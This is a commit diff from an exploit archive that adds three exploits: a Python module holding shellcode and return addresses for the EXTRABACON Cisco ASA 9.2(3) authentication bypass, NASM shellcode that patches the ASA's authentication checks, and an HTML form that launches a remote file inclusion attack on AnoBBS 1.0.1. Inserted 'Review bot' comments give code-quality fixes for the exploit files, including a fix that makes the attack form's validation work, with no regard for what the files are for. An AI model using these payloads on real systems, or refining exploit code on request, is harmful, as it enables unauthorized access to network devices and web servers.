DB: 2016-09-17
3 new exploits Too many to list!
This commit is contained in:
parent
54446fef7a
commit
4aa6d571e7
4 changed files with 1621 additions and 1402 deletions
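--- a/platforms/hardware/remote/40386.py
+++ b/platforms/hardware/remote/40386.py
@@ -0,0 +1,65 @@
+#
+# Cisco ASA 9.2(3) Authentication Bypass (EXTRABACON Module)
+#
+# Copyright: (c) 2016 RiskSense, Inc. (https://risksense.com)
+# License: http://opensource.org/licenses/MIT
+# Release Date: September 15, 2016
+#
+# Authors:
+# Sean Dillon (2E3C8D72353C9B8C9FF797E753EC4C9876D5727B)
+# Zachary Harding (14C0AA3670E9501ADDFC0176298CD7A969BAA8A1)
+#
+# Description:
+# Additional EXTRABACON module for Cisco ASA version 9.2(3).
+# This does not use the same shellcode as the Equation Group version,
+# but accomplishes the same task of disabling the auth functions
+# in less stages/bytes.
+#
+# Build/Run:
+# 1) Save this file to versions/shellcode_asa923.py
+# 2) Add the version string to fw_version_check()
+# 3) Shellcode is for --pass-disable
+#
+
+vers = "asa923"
+
+# there is a jmp esp @ 08 1d 70 1d
+# 81d701c: e8 ff e4 ff ff call 81d5520 <_ctm_hw_free@@Base+0x50fd0>
+my_ret_addr_len = 4
+my_ret_addr_byte = "\x1d\x70\x1d\x08"
+my_ret_addr_snmp = "29.112.29.8"
+
+finder_len = 9
+finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90"
+finder_snmp = "139.124.36.20.139.7.255.224.144"
+
+# ROPgadget --binary lina_92-3 --opcode 897dfc8b1685d2
+# 0x9b78010 = function
+# 0x9b78000 = byte boundary
+# 0x8085a40
+# 0x8085000
+# preamble has a stack clean up and offset to where we first hijacked execution
+# 0x9277386
+preamble_len = 69
+preamble_byte = "\x31\xc0\x31\xdb\x31\xf6\x31\xc9\x60\x80\xc5\x10\x80\xc2\x07\x04\x7d\x50\xbb\x00\x80\xb7\x09\xcd\x80\x58\xbb\x00\x50\x08\x08\xcd\x80\x68\x31\xc0\x40\xc3\x58\xa3\x10\x80\xb7\x09\xa3\x40\x5a\x08\x08\x61\x68\x86\x73\x27\x09\x80\xc3\x10\xbf\x0b\x0f\x0f\x0f\x89\xe5\x83\xc5\x48\xc3"
+preamble_snmp = "49.192.49.219.49.246.49.201.96.128.197.16.128.194.7.4.125.80.187.0.128.183.9.205.128.88.187.0.80.8.8.205.128.104.49.192.64.195.88.163.16.128.183.9.163.64.90.8.8.97.104.134.115.39.9.128.195.16.191.11.15.15.15.137.229.131.197.72.195"
+
+postscript_len = 2
+postscript_byte = "\x61\xc3"
+postscript_snmp = "97.195"
+
+launcher_len = 6
+launcher_snmp = "144.144.144.144.144.144"
+launcher_byte = "\x90\x90\x90\x90\x90\x90"
+
+payload_nop_len = 116
+payload_nop_byte = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\x1d\x80\xbe\x09\x50\xb8\x05\x60\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58\xc3"
+payload_nop_snmp = "144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.184.29.128.190.9.80.184.5.96.163.173.53.165.165.165.165.255.208.88.195"
+
+payload_PMCHECK_DISABLE_len = 70
+payload_PMCHECK_DISABLE_byte = "\x7a\x30\x78\x30\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x25\x12\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x10\x80\xb7\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3"
+payload_PMCHECK_DISABLE_snmp = "122.48.120.48.191.165.165.165.165.184.216.165.165.165.49.248.187.165.37.18.172.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.16.128.183.9.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195"
+
+payload_AAAADMINAUTH_DISABLE_len = 66
+payload_AAAADMINAUTH_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xf5\xad\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x40\x5a\x08\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3"
+payload_AAAADMINAUTH_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.245.173.173.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.64.90.8.8.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195"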
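Review bot: Each `*_len` / `*_byte` / `*_snmp` triple, from `my_ret_addr_len` through `payload_AAAADMINAUTH_DISABLE_snmp`, is the same data kept in three hand-maintained copies, so editing one literal can silently leave its length or dotted form stale. Deriving the two secondary forms from the byte string at import, e.g. `preamble_len = len(preamble_byte)` and `preamble_snmp = ".".join(str(ord(c)) for c in preamble_byte)`, leaves a single source of truth; the same applies to the finder, postscript, launcher and payload_* groups. The module has no docstring; a one-line header such as `"""Version-specific constants for ASA 9.2(3); consumed by fw_version_check() in the caller."""` would say what the file is for without repeating the comment block.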
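--- a/platforms/hardware/shellcode/40387.nasm
+++ b/platforms/hardware/shellcode/40387.nasm
@@ -0,0 +1,90 @@
+;
+; Cisco ASA Authentication Bypass (EXTRABACON) Better Shellcode (69 bytes)
+;
+; Copyright: (c) 2016 RiskSense, Inc. (https://risksense.com)
+; License: http://opensource.org/licenses/MIT
+; Release Date: September 15, 2016
+;
+; Author: Sean Dillon (2E3C8D72353C9B8C9FF797E753EC4C9876D5727B)
+;
+; Description:
+; This is not the same shellcode as the Equation Group version,
+; but accomplishes the same task of disabling the auth functions
+; in less stages/bytes. Particularly, it is 69 bytes in one stage
+; instead of 200+ bytes spread across 2 stages.
+;
+; Build/Run:
+; 1) $ nasm shelldisable.nasm
+; 2) copy resulting shellcode into preamble_byte/preamble_snmp vars
+; 3) Change launcher_snmp to 6 nops (or remove entirely)
+;
+; Note: The offsets given are for 9.2(3), not part of the original release
+;
+BITS 32
+
+SAFERET_OFFSET equ 0x9277386 ; where to continue execution
+PMCHECK_BOUNDS equ 0x9b78000 ; mprotect for pmcheck()
+PMCHECK_OFFSET equ 0x9b78010 ; location of pmcheck()
+ADMAUTH_BOUNDS equ 0x8085000 ; page align for admauth()
+ADMAUTH_OFFSET equ 0x8085a40 ; location of admauth()
+
+; we must patch pmcheck() and admauth() to always return true
+; xor eax, eax = 31 c0
+; inc eax = 40
+; ret = c3
+
+PATCH_CODE equ 0xc340c031 ; gotta love endianess
+
+; we need to fix the function frame to continue normal operation
+; eax = 0x0
+; esi = 0x0
+; edi = 0x0b
+; ebx = 0x10
+; ebp = [esp - 0x4 (ret)] + 0x??
+FIX_EBP equ 0x48 ; this is 0x58, etc. in some versions
+FIX_EDI equ 0x0f0f0f0b ; seems static?
+FIX_EBX equ 0x10 ; seems static?
+
+_start:
+
+; these are registers we have to clean up, so we can null them before save
+xor eax, eax
+xor ebx, ebx
+xor esi, esi
+xor ecx, ecx ; ecx is volatile register
+
+pusha ; save all registers
+
+add ch, 0x10 ; ecx = 0x1000
+add dl, 0x7 ; edx = 0x7
+add al, 0x7d ; eax = 0x7d
+
+push eax ; save eax for second call
+
+mov ebx, PMCHECK_BOUNDS ; ebx = byte boundary for mprotect
+
+int 0x80 ; sys_mprotect(PMCHECK_BOUNDS, 0x1000, 0x7)
+
+pop eax ; eax = 0x7d
+mov ebx, ADMAUTH_BOUNDS ; second function page align
+
+int 0x80 ; sys_mprotect(ADMAUTH_BOUNDS, 0x1000, 0x7)
+
+push PATCH_CODE
+pop eax
+
+mov dword [PMCHECK_OFFSET], eax ; write patch code to both functions
+mov dword [ADMAUTH_OFFSET], eax
+
+popa ; restore all registers
+
+push SAFERET_OFFSET ; push the safe return address
+
+; these registers are pre-xored
+add bl, FIX_EBX
+mov edi, FIX_EDI
+
+mov ebp, esp
+add ebp, FIX_EBP
+
+ret ; return to safe address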
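--- a/platforms/php/webapps/40388.html
+++ b/platforms/php/webapps/40388.html
@@ -0,0 +1,61 @@
+<!--
+# Title: AnoBBS 1.0.1 Remote File Inclusion Exploit
+# Author: bd0rk || Germany
+# Tested on: Ubuntu-Linux
+# Twitter: twitter.com/bd0rk
+# Greetz: Vadim, x0r_32, rgod, zone-h.org, Michael RaumklanG
+
+#Vendor-URL: http://www.iterapi.com/index.php?cat=78&art=788
+#Download-Link: http://www.hotscripts.com/listings/jump/download/90434
+
+#The $prog_dir-parameter in /anobbs_dev_1.0.1/progs/bbs_auth.php line 7 is vulnerable.
+
+>>>Exploitcode for Copy&Paste<<<
+-->
+
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<title>AnoBBS 1.0.1 Remote File Inclusion Exploit</title>
+<script language="JavaScript">
+
+var dir="/progs/"
+var file="/bbs_auth.php?"
+var parameter ="prog_dir="
+var shell="Insert your shellcode here"
+
+function command() {
+if (document.rfi.target1.value==""){
+alert("Exploit failed...");
+return false;
+}
+
+rfi.action= document.rfi.target1.value+dir+file+parameter+shell;
+rfi.submit();
+}
+</script>
+</head>
+
+<body bgcolor="#000000">
+<center>
+
+<p><b><font face="Verdana" size="2" color="#008000">AnoBBS 1.0.1 Remote File Inclusion Exploit</font></b></p>
+
+<p></p>
+<form method="post" target="getting" name="rfi" onSubmit="command();">
+<b><font face="Arial" size="1" color="#FF0000">Target:</font><font face="Arial" size="1" color="#808080">[http://[target]/[directory]</font><font color="#00FF00" size="2" face="Arial">
+</font><font color="#FF0000" size="2">&nbps;</font></b>
+<input type="text" name="target1" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"></p>
+<p><input type="submit" value="Start" name="B1"><input type="reset" value="Delete" name="B2"></p>
+</form>
+<p><br>
+<iframe name="getting" height="337" width="633" scrolling="yes" frameborder="0"></iframe>
+</p>
+
+<b><font face="Verdana" size="2" color="#008000">bd0rk</font></b></p>
+</center>
+</body>
+
+</html>
+
+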
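Review bot: `&nbps;` in the target label is not an HTML entity and renders as literal text; the intended spelling is `&nbsp;`. The `<script language="JavaScript">` attribute is obsolete markup, and `<script type="text/javascript">` is the conventional form. The handler `onSubmit="command();"` discards the function's return value, so the `return false;` for an empty target never cancels the submission; `onSubmit="return command();"` would make the form and the validation agree. The `rfi.action=` line relies on the implicit named-form global while the line above uses `document.rfi`; using `document.rfi` in both places is the consistent choice.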